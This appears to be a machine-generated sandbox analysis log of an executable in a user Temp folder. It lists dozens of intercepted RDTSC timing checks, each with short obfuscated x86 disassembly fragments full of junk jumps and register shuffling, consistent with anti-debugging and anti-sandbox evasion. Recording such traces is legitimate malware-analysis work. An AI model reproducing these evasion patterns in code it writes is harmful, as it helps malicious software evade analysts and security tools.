Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB0EE0 second address: 4BB0F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F73D4D0E055h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov bx, si 0x00000014 pushfd 0x00000015 jmp 00007F73D4D0E058h 0x0000001a sub ecx, 62BC3378h 0x00000020 jmp 00007F73D4D0E04Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov edx, 4A77E566h 0x00000030 mov esi, ebx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB0F3C second address: 4BB0F44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C00069 second address: 4C0006D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C0006D second address: 4C00071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C00071 second address: 4C00077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C00077 second address: 4C000A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F73D4C57618h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C000A0 second address: 4C000A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C000A6 second address: 4C000AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C000AC second address: 4C000B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90130 second address: 4B90137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90137 second address: 4B90166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F73D4D0E04Eh 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F73D4D0E050h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90166 second address: 4B9016C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90205 second address: 4B9020B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B9020B second address: 4B90211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90211 second address: 4B90215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90215 second address: 4B90219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB0CCC second address: 4BB0CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB0CD0 second address: 4BB0CE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB0CE3 second address: 4BB0CFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E054h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB0CFB second address: 4BB0CFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB0785 second address: 4BB0794 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB0794 second address: 4BB084D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F73D4C5760Fh 0x00000009 add al, FFFFFFDEh 0x0000000c jmp 00007F73D4C57619h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F73D4C57610h 0x00000018 adc ecx, 7AC15BD8h 0x0000001e jmp 00007F73D4C5760Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebp 0x00000028 jmp 00007F73D4C57616h 0x0000002d push eax 0x0000002e jmp 00007F73D4C5760Bh 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 call 00007F73D4C5760Bh 0x0000003c pop eax 0x0000003d pushfd 0x0000003e jmp 00007F73D4C57619h 0x00000043 sbb ah, FFFFFF86h 0x00000046 jmp 00007F73D4C57611h 0x0000004b popfd 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB084D second address: 4BB0879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov ebx, eax 0x0000000d pushfd 0x0000000e jmp 00007F73D4D0E04Ch 0x00000013 adc si, A558h 0x00000018 jmp 00007F73D4D0E04Bh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB06A1 second address: 4BB06D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57615h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F73D4C57611h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB06D2 second address: 4BB06FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F73D4D0E059h 0x0000000a jmp 00007F73D4D0E04Bh 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB0409 second address: 4BB040D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB040D second address: 4BB042A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB042A second address: 4BB0430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BC01E2 second address: 4BC023F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F73D4D0E04Bh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F73D4D0E056h 0x00000015 mov ebp, esp 0x00000017 jmp 00007F73D4D0E050h 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F73D4D0E057h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF0F2C second address: 4BF0F30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF0F30 second address: 4BF0F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF0F36 second address: 4BF0F3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BD001D second address: 4BD0032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E051h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BD02D9 second address: 4BD033B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F73D4C57610h 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007F73D4C57611h 0x00000016 pop edx 0x00000017 mov ecx, 65ACF7F3h 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F73D4C57616h 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BD033B second address: 4BD0358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF06E7 second address: 4BF06FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C57614h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF06FF second address: 4BF0715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F73D4D0E04Ah 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF0715 second address: 4BF0799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F73D4C57611h 0x00000009 sbb si, 7716h 0x0000000e jmp 00007F73D4C57611h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F73D4C57610h 0x0000001a and al, 00000038h 0x0000001d jmp 00007F73D4C5760Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F73D4C5760Bh 0x00000030 sbb eax, 4DA2F8FEh 0x00000036 jmp 00007F73D4C57619h 0x0000003b popfd 0x0000003c mov si, E147h 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF0799 second address: 4BF079F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF079F second address: 4BF07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF07A3 second address: 4BF07F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F73D4D0E059h 0x00000011 xchg eax, ecx 0x00000012 jmp 00007F73D4D0E04Eh 0x00000017 mov eax, dword ptr [774365FCh] 0x0000001c pushad 0x0000001d mov bh, al 0x0000001f mov si, bx 0x00000022 popad 0x00000023 test eax, eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 mov dx, 5C64h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF07F6 second address: 4BF087E instructions: 0x00000000 rdtsc 0x00000002 mov bx, DAD0h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F73D4C57619h 0x0000000d push ecx 0x0000000e pop ebx 0x0000000f pop eax 0x00000010 popad 0x00000011 je 00007F744741A751h 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F73D4C57619h 0x0000001e or ecx, 4F52B0B6h 0x00000024 jmp 00007F73D4C57611h 0x00000029 popfd 0x0000002a mov edi, ecx 0x0000002c popad 0x0000002d mov ecx, eax 0x0000002f jmp 00007F73D4C5760Ah 0x00000034 xor eax, dword ptr [ebp+08h] 0x00000037 jmp 00007F73D4C57611h 0x0000003c and ecx, 1Fh 0x0000003f pushad 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF087E second address: 4BF08D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F73D4D0E058h 0x0000000a sub cx, 9D68h 0x0000000f jmp 00007F73D4D0E04Bh 0x00000014 popfd 0x00000015 popad 0x00000016 movzx eax, dx 0x00000019 popad 0x0000001a ror eax, cl 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F73D4D0E04Ch 0x00000025 xor esi, 4ACAEFC8h 0x0000002b jmp 00007F73D4D0E04Bh 0x00000030 popfd 0x00000031 push eax 0x00000032 pop edx 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF08D8 second address: 4BF08DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF08DD second address: 4BF08F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, dx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a leave 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, E84Bh 0x00000012 movzx ecx, di 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF08F3 second address: 4BF0910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C57619h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF0910 second address: 4BF0914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF0914 second address: 4BF096C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00822014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007F73D9067F55h 0x00000023 push FFFFFFFEh 0x00000025 pushad 0x00000026 jmp 00007F73D4C57613h 0x0000002b mov cx, EBEFh 0x0000002f popad 0x00000030 pop eax 0x00000031 pushad 0x00000032 call 00007F73D4C57610h 0x00000037 jmp 00007F73D4C57612h 0x0000003c pop eax 0x0000003d mov cx, bx 0x00000040 popad 0x00000041 ret 0x00000042 nop 0x00000043 push eax 0x00000044 call 00007F73D9067F93h 0x00000049 mov edi, edi 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF096C second address: 4BF0970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF0970 second address: 4BF0986 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57612h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF0986 second address: 4BF09C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F73D4D0E051h 0x00000009 add ax, 0D16h 0x0000000e jmp 00007F73D4D0E051h 0x00000013 popfd 0x00000014 mov ecx, 72DC3387h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF09C1 second address: 4BF09C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF09C5 second address: 4BF09CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF09CB second address: 4BF09EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F73D4C5760Dh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BF09EF second address: 4BF0A04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0034 second address: 4BA0043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0043 second address: 4BA0134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c call 00007F73D4D0E04Dh 0x00000011 pop esi 0x00000012 pushfd 0x00000013 jmp 00007F73D4D0E051h 0x00000018 and esi, 6DB8FBC6h 0x0000001e jmp 00007F73D4D0E051h 0x00000023 popfd 0x00000024 popad 0x00000025 call 00007F73D4D0E050h 0x0000002a pushfd 0x0000002b jmp 00007F73D4D0E052h 0x00000030 adc eax, 0C3FB798h 0x00000036 jmp 00007F73D4D0E04Bh 0x0000003b popfd 0x0000003c pop eax 0x0000003d popad 0x0000003e xchg eax, ebp 0x0000003f pushad 0x00000040 movzx ecx, bx 0x00000043 popad 0x00000044 mov ebp, esp 0x00000046 jmp 00007F73D4D0E053h 0x0000004b and esp, FFFFFFF8h 0x0000004e jmp 00007F73D4D0E056h 0x00000053 xchg eax, ecx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 pushfd 0x00000058 jmp 00007F73D4D0E04Dh 0x0000005d sbb si, 8146h 0x00000062 jmp 00007F73D4D0E051h 0x00000067 popfd 0x00000068 mov bx, si 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0134 second address: 4BA01A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F73D4C57613h 0x00000008 pop ecx 0x00000009 mov dx, AE2Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007F73D4C57612h 0x00000016 xchg eax, ecx 0x00000017 jmp 00007F73D4C57610h 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F73D4C5760Dh 0x00000026 xor si, DD66h 0x0000002b jmp 00007F73D4C57611h 0x00000030 popfd 0x00000031 mov dh, ch 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA01A2 second address: 4BA01A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA01A8 second address: 4BA01C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA01C9 second address: 4BA01CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA01CF second address: 4BA01F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F73D4C57610h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA01F7 second address: 4BA0206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0206 second address: 4BA021E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C57614h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA021E second address: 4BA0249 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F73D4D0E055h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0249 second address: 4BA0265 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0265 second address: 4BA0269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0269 second address: 4BA027C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA027C second address: 4BA0282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0282 second address: 4BA0299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0299 second address: 4BA02A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA02A0 second address: 4BA0305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F73D4C5760Eh 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 jmp 00007F73D4C57610h 0x00000017 xchg eax, edi 0x00000018 jmp 00007F73D4C57610h 0x0000001d push eax 0x0000001e jmp 00007F73D4C5760Bh 0x00000023 xchg eax, edi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F73D4C57610h 0x0000002d rdtsc
